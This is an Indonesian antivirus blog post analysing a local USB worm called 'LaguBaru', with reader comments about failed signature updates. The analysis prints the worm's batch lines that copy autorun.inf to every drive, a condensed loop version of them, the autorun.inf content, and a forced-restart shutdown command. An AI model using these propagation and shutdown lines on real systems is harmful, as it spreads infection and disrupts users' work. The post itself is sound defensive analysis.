Home > Analisa Virus > LaguBaru: This is my life.exe di Desktop

LaguBaru: This is my life.exe di Desktop

January 6th, 2014

LaguBaru This is my life.exe di Desktop

Meski malware ini beredar sejak akhir November, beberapa antivirus luar masih belum mendeteksi worm lokal ini. LaguBaru, kami menamakan worm ini dengan nama tersebut karena worm ini membuat file Lagu Baru.exe di Desktop dan removable drive.

Worm LaguBaru merupakan malware si tukang sampah karena menduplikasikan dirinya berdasarkan nama folder. Worm ini juga memiliki karakteristik worm lokal yaitu memodifikasi registry untuk mendisable beberapa fitur Windows seperti Control Panel, Folder Option, Context Menu dan lainnya. Dengan rutin yang dilakukan ini, dapat kita lihat jika worm ini berusaha eksis diketahui pengguna komputer yang dinfeksi. Apalagi dengan adanya file pada Desktop dengan nama My Name Is On Site.exe dan This is my life.exe. Tentu saja, tidak ada yang perduli dengan nama dan kehidupan pembuat worm ini.

LaguBaru This is my life.exe di Desktop 2

Dibuat dengan menggunakan compiler lama yaitu Borland Delphi, worm ini juga menggunakan program converter file bat menjadi file executable. Program converter yang digunakan juga merupakan program trial. Kenapa pembuat worm ini menggunakan program converter bat to exe? Apakah untuk mencegah file mudah terdeteksi melalui heuristik antivirus? Apapun jawabannya, yang pasti pembuat worm ini tidak terlalu mahir dalam pemrograman. Jika kita lihat kode pada file bat, ada perintah mengkopikan file ke setiap drive dan ironisnya yaitu sintak pengkopian file ditulis semua yaitu dari drive C hingga drive Z.

copy autorun.inf c:\autorun.inf
copy autorun.inf d:\autorun.inf
copy autorun.inf e:\autorun.inf
copy autorun.inf f:\autorun.inf
copy autorun.inf g:\autorun.inf
copy autorun.inf h:\autorun.inf
copy autorun.inf i:\autorun.inf
copy autorun.inf j:\autorun.inf
copy autorun.inf k:\autorun.inf
copy autorun.inf l:\autorun.inf
copy autorun.inf m:\autorun.inf
copy autorun.inf n:\autorun.inf
copy autorun.inf o:\autorun.inf
copy autorun.inf p:\autorun.inf
copy autorun.inf q:\autorun.inf
copy autorun.inf r:\autorun.inf
copy autorun.inf s:\autorun.inf
copy autorun.inf t:\autorun.inf
copy autorun.inf u:\autorun.inf
copy autorun.inf v:\autorun.inf
copy autorun.inf w:\autorun.inf
copy autorun.inf x:\autorun.inf
copy autorun.inf y:\autorun.inf
copy autorun.inf z:\autorun.inf

Padahal, 24 baris diatas dapat ditulis dengan satu baris yaitu:

for /d %D in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do copy autorun.inf “%D:\autorun.inf”

Worm ini juga membuat file autorun.inf disetiap drive dengan isi yang sederhana:

[autorun]
open=lagu baru.exe

Worm ini semakin meresahkan karena mematikan komputer yang terinfeksi dengan perintah shutdown.

shutdown -r -t 10 -c “Aku me-restart komputer Anda. Harap menyimpan pekerjaan Anda sekarang ” -f

PCMAV 9.6 dengan Update build2 telah dapat mendeteksi dan membasmi worm LaguBaru.

facebooktwittergoogle_plusredditpinterestlinkedinmail
Categories: Analisa Virus Tags:
  1. Indra
    January 6th, 2014 at 11:31 | #1

    Review Malwarenya makin banyak :D

  2. BAIM
    January 6th, 2014 at 11:43 | #2

    Katanya update build 2 bisa deteksi, tapi di update Kok Ngk ada??? Bingung dengan pengumumannya.

  3. January 6th, 2014 at 11:44 | #3

    @BAIM
    Di update? Pengumuman yang mana?

  4. January 6th, 2014 at 11:46 | #4

    @Indra
    Blog dan update build akan lebih rutin diupdate.

  5. JaCK laMer
    January 6th, 2014 at 11:46 | #5

    Untuk apa ada pengumuman tapi kenyataanX kagak Ada update.

  6. January 6th, 2014 at 11:48 | #6

    @JaCK laMer
    Sudah coba update online belum?

  7. BAIM
    January 6th, 2014 at 11:48 | #7

    PCMAV 9.6 dengan Update build2 telah dapat mendeteksi dan membasmi worm LaguBaru.??? Update db-nya, Mana Bro?

  8. January 6th, 2014 at 11:49 | #8

    @BAIM
    Silahkan update secara online.

  9. JaCK laMer
    January 6th, 2014 at 11:54 | #9

    @Fajar Anggiawan
    SkrG ane udah coba, tapi muncul “vx1.sig corrupt.Exiting. Update db offline aja bos, biar gmpang.

  10. BAIM
    January 6th, 2014 at 12:00 | #10

    WalaH kgk bisa, muncul is corrupt exiting. SolusiX gmn?

  11. Sony
    January 6th, 2014 at 12:03 | #11

    @Fajar Anggiawan
    Huft ribet update Online PCMAV. masa file update coorupt exiting.

  12. January 6th, 2014 at 12:04 | #12

    Tes di Windows 7 dan Windows XP (berbeda komputer) berjalan lancar. Kami cek lagi.

  13. Sony
    January 6th, 2014 at 12:07 | #13

    Update offline Aja Bro Fajar.

  14. BAIM
    January 6th, 2014 at 12:13 | #14

    Gue pikiR lebih baek pke Cara dulu, selalu ada 2 opsi untuk update offline dan online. Yang kYk gini Mah bikin susaH. Apalagi pke Proxy dan non Proxy, pasti beda.

  15. January 6th, 2014 at 12:20 | #15

    @BAIM
    Kami akan cari tahu terlebih dahulu mengenai laporan update yang gagal. Kalau boleh tahu, hash MD5 dari file vx1.sig dan PCMAVcore.dll di mas BAIM apa ya? Untuk cek hash MD5, bisa gunakan extension pada PCMAV yaitu MD5 Checker.

  16. rahman
    January 6th, 2014 at 14:56 | #16

    Mas Fajar, saya juga mengalami hal yg sama. MD5 file vx.xig (aeca2ad063e82265e7036087f78df3b7) dan PCMAVcore,dll (df897734171db105229cf1937f5f2e9f)

  17. rahman
    January 6th, 2014 at 14:58 | #17

    @Fajar Anggiawan
    Mas Fajar, saya juga mengalami hal yg sama. MD5 file vx1.sig (aeca2ad063e82265e7036087f78df3b7) dan PCMAVcore,dll (df897734171db105229cf1937f5f2e9f)

  18. rahman
    January 6th, 2014 at 14:59 | #18

    rahman :
    Mas Fajar, saya juga mengalami hal yg sama. MD5 file vx.xig (aeca2ad063e82265e7036087f78df3b7) dan PCMAVcore,dll (df897734171db105229cf1937f5f2e9f)

  19. January 6th, 2014 at 15:10 | #19

    File vx1.sig berbeda dari file yang ada di server update. Boleh upload file vx1.sig tsb?

  20. January 6th, 2014 at 15:28 | #20

    File yang Anda kirim merupakan file update untuk PCMAV 8.8. Sebenarnya file update untuk versi tsb suah dihapus. Saya cek lagi.

  21. rahman
    January 6th, 2014 at 15:33 | #21

    Trus Bgmna solusinya mas Fajar?

  22. PC Ranger
    January 6th, 2014 at 18:37 | #22

    Apa harus menunggu PCMAV 9.7 rilis dulu?

  23. January 6th, 2014 at 20:10 | #23

    @rahman
    Begini, di server hanya file update untuk PCMAV 9.6 tapi kenapa file update yang dikirim Anda untuk PCMAV 8.8.. Coba hapus dulu file vx1.sig dan update kembali menggunakan PCMAV 9.6

    @PC Ranger
    Apa Anda juga gagal update?

  24. hari
    January 6th, 2014 at 20:30 | #24

    Pak Fajar, kalo vx1.sig dengan hash ee858e58de8dd09e541b45781387b7db dan PCMAVcore.dll dengan hash 83f932c08bbe578c1541c4e0148e24dc itu bener ngga ? :D File PCMAVcore.dll dengan hash df897734171db105229cf1937f5f2e9f asalnya dari versi yang dikompresi (*.rar)

  25. January 6th, 2014 at 20:48 | #25

    @hari
    You got it Pak Hari. Selamat :D
    Btw, sukses update kan pak?

  26. hari
    January 6th, 2014 at 21:15 | #26

    @FA
    Sukses Pak. Fitur untuk menghapus vx1.sig dari versi yang sebelumnya juga berjalan dengan baik. Perlu juga dicatat bahwa ada file PCMAVcore.dll dengan hash 3a2288c83ee41021b06fb1fffadf0df8. Terima kasih.

  27. rahman
    January 6th, 2014 at 22:22 | #27

    @Fajar Anggiawan
    Saya juga tidak tahu, kenapa terjadi seperti itu. Ya sdhlah klu gt.

  28. Indra
    January 7th, 2014 at 01:03 | #28

    @FA
    Maksud dari Jack dan BAIM adalah menyediakan link download ke sendspace atau zippyshare, saat ini belum bisa ya?

  29. Indra
    January 7th, 2014 at 13:32 | #29

    Pertama update cuma vx1.sig aja yg diupdate (setelah verifikasi hash md5 dari hari), tapi PCMAVcore.dll belum bisa update otomatis. akhirnya pas dihapus filenya, PCMAVcore.dll update secara otomatis :)

  30. January 24th, 2014 at 10:04 | #30

    alhamdulilah saya belum pernah terkena virus ini. btw penyebaranya di daerah mana aja nih min ?

Comments are closed.